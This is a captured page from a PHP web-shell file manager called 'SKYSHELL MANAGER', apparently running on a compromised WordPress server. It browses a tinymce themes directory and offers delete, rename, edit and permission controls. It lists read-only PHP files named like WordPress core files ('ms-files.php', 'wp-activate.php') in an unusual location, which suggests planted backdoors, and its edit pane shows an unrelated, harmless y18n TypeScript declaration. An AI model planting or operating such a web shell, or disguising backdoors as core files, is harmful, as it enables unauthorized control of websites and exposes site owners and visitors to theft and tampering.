📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.d.ts
export interface Y18NOpts { directory?: string; updateFiles?: boolean; locale?: string; fallbackToLanguage?: boolean; } export interface Locale { [key: string]: string; } export interface PlatformShim { fs: { readFileSync: Function; writeFile: Function; }; exists: Function; format: Function; resolve: Function; } export declare function y18n(opts: Y18NOpts, _shim: PlatformShim): { __: (...args: (string | Function)[]) => string; __n: () => any; setLocale: (locale: string) => void; getLocale: () => string; updateLocale: (obj: Locale) => void; locale: string; };
Save